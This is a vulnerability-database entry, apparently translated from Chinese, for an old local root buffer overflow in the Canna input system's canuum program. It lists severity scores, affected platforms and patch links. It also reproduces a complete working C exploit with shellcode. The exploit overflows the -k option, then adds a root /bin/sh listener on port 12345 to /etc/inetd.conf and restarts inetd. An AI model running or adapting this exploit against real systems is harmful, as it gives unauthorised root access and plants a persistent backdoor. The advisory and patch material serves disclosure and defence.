CVE-1999-0949
CVSS 7.2
Published: 1999-11-02 00:00:00
Last revised: 2008-09-09 08:36:14

[Original] Buffer overflow in canuum program for Canna input system allows local users to gain root privileges.


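[CNNVD] Canna subsystem 'uum' buffer overflow vulnerability (CNNVD-199911-011)

        The canuum program for the Canna input system contains a buffer overflow vulnerability. Local users can gain root privileges.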

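- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]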

- CPE (affected platforms and products)

cpe:/o:sgi:irix:6.3 SGI IRIX 6.3
cpe:/o:sgi:irix:6.2 SGI IRIX 6.2
cpe:/o:sgi:irix:5.3 SGI IRIX 5.3
cpe:/o:sun:solaris:2.6
cpe:/o:sun:solaris:7.0::x86
cpe:/o:sgi:irix:6.4 SGI IRIX 6.4
cpe:/o:sun:solaris:7.0
cpe:/o:turbolinux:turbolinux:4.2
cpe:/o:sun:solaris:2.6::x86
cpe:/o:sgi:irix:6.5 SGI IRIX 6.5

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0949
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0949
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199911-011
(Official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/757
(UNKNOWN)  BID  757

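- Vulnerability information

Canna subsystem 'uum' buffer overflow vulnerability
High risk  Buffer overflow
1999-11-02 00:00:00 2005-10-20 00:00:00
Local
        The canuum program for the Canna input system contains a buffer overflow vulnerability. Local users can gain root privileges.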

- Advisories and patches

        Patches are available for Debian Linux at:
         Alpha architecture:
        http://security.debian.org/dists/stable/updates/binary-alpha/canna-utils_3.5b2-24slink1_alpha.deb
         MD5 checksum: b9318bb7dcb1936c3d16c54f8c799564
        http://security.debian.org/dists/stable/updates/binary-alpha/canna_3.5b2-24slink1_alpha.deb
         MD5 checksum: 1bcbbd1c4ad3146d66b2ca10b4914ccf
        http://security.debian.org/dists/stable/updates/binary-alpha/libcanna1g-dev_3.5b2-24slink1_alpha.deb
         MD5 checksum: 05df65c96e2adfc6d1cde593ef76ca33
        http://security.debian.org/dists/stable/updates/binary-alpha/libcanna1g_3.5b2-24slink1_alpha.deb
         MD5 checksum: b1e30d11faaccbf0014c42e56949c87c
        Intel ia32 architecture:
        http://security.debian.org/dists/stable/updates/binary-i386/canna-utils_3.5b2-24slink1_i386.deb
         MD5 checksum: 45705fd8a8d230d3dd0094707eb2fac3
        http://security.debian.org/dists/stable/updates/binary-i386/canna_3.5b2-24slink1_i386.deb
         MD5 checksum: c15a54507be2fc745d55718efbae4f74
        Motorola 680x0 architecture:
        http://security.debian.org/dists/stable/updates/binary-m68k/canna-utils_3.5b2-24slink1_m68k.deb
         MD5 checksum: aa0ef7ffe8ca29a99ba882513dd29888
        http://security.debian.org/dists/stable/updates/binary-m68k/canna_3.5b2-24slink1_m68k.deb
         MD5 checksum: 4069ed58591b44a5c670fd0a91e77ae1
        http://security.debian.org/dists/stable/updates/binary-m68k/libcanna1g-dev_3.5b2-24slink1_m68k.deb
         MD5 checksum: 005a4f8f6dbdafc1f1ccdc8443ddc8ad
        http://security.debian.org/dists/stable/updates/binary-m68k/libcanna1g_3.5b2-24slink1_m68k.deb
         MD5 checksum: 5aff2c0b7b089900faff113ce8a0abab
        Patches are available for FreeBSD at:
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/japanese/Canna-3.2.2.tar.gz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/japanese/Canna-3.2.2.tar.gz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/japanese/Canna-3.2.2.tar.gz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/japanese/Canna-3.2.2.tar.gz
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/japanese/Canna-3.2.2.tar.gz

- Vulnerability information (19583)

Turbolinux 3.5 b2 'canuum' Buffer Overflow Vulnerability (EDBID:19583)
unix local
1999-11-02 Verified
0 UNYUN
N/A
source: http://www.securityfocus.com/bid/758/info

Canna is a Japanese input system available as free software. Canna provides a unified user interface for inputting Japanese.

Canna supports Nemacs (Mule), kinput2 and canuum. All of these tools can share a single customization file, the same romaji-to-kana conversion rules and the same conversion dictionaries, and they input Japanese in the same way.

Canna converts kana to kanji based on a client-server model and supports automatic kana-to-kanji conversion.

The Canna subsystem on certain UNIX versions contains a buffer overflow in the 'canuum' program. Canuum is a Japanese input tty frontend for Canna using uum. Certain versions have a buffer overflow via unchecked user-supplied data in the -k, -c and -n options.

Since this program is installed SUID root, this attack will result in a root-level compromise.

/*=============================================================================
   canuum Exploit for Linux 
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin@backsection.net)
  =============================================================================
*/
#include    <stdio.h>

#define RETADR   1676
#define MAXBUF   2000
#define JMP_OFS  0x200
#define NOP      0x90
#define SHELL    "/tmp/pp"
#define COMPILER "gcc"


char exec[60]= 
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff";
FILE *fp;

unsigned long get_sp(void)
{
    __asm__("movl %esp, %eax");
}

main()
{
    char            buf[MAXBUF+1];
    unsigned int    i,ip,sp;

    sprintf(buf,"%s.c",SHELL);
    if ((fp=fopen(buf,"w"))==NULL){
        printf("Can not write to %s\n",buf);
        exit(1);
    }
    fprintf(fp,"main(){setuid(0);setgid(0);");
    fprintf(fp,"system(\"echo 12345 stream tcp nowait root /bin/sh sh -i");
    fprintf(fp," >> /etc/inetd.conf; killall -HUP inetd\");}\n");
    fclose(fp);
    sprintf(buf,"%s %s.c -o %s",COMPILER,SHELL,SHELL);
    system(buf);

    memset(buf,'a',MAXBUF);
    buf[MAXBUF]=0;

    strcat(exec,SHELL);
    memcpy(buf+300,exec,strlen(exec));
    sp=get_sp();
    ip=sp+JMP_OFS;
    printf("Jumping address = %x\n\n\n",ip);
    printf("Please execute following command after \"Segmentation Fault\"\n");
    printf("\ntelnet localhost 12345\n\n\n");
    buf[RETADR  ]=ip&0xff;
    buf[RETADR+1]=(ip>>8)&0xff;
    buf[RETADR+2]=(ip>>16)&0xff;
    buf[RETADR+3]=(ip>>24)&0xff;
    execl("/usr/jp/canna/bin/canuum","canuum","-k",buf,(char *)0);
}
		

- Vulnerability information

9823
Canna Input System canuum Multiple Option Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

1999-11-02 Unknown
1999-11-02 Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete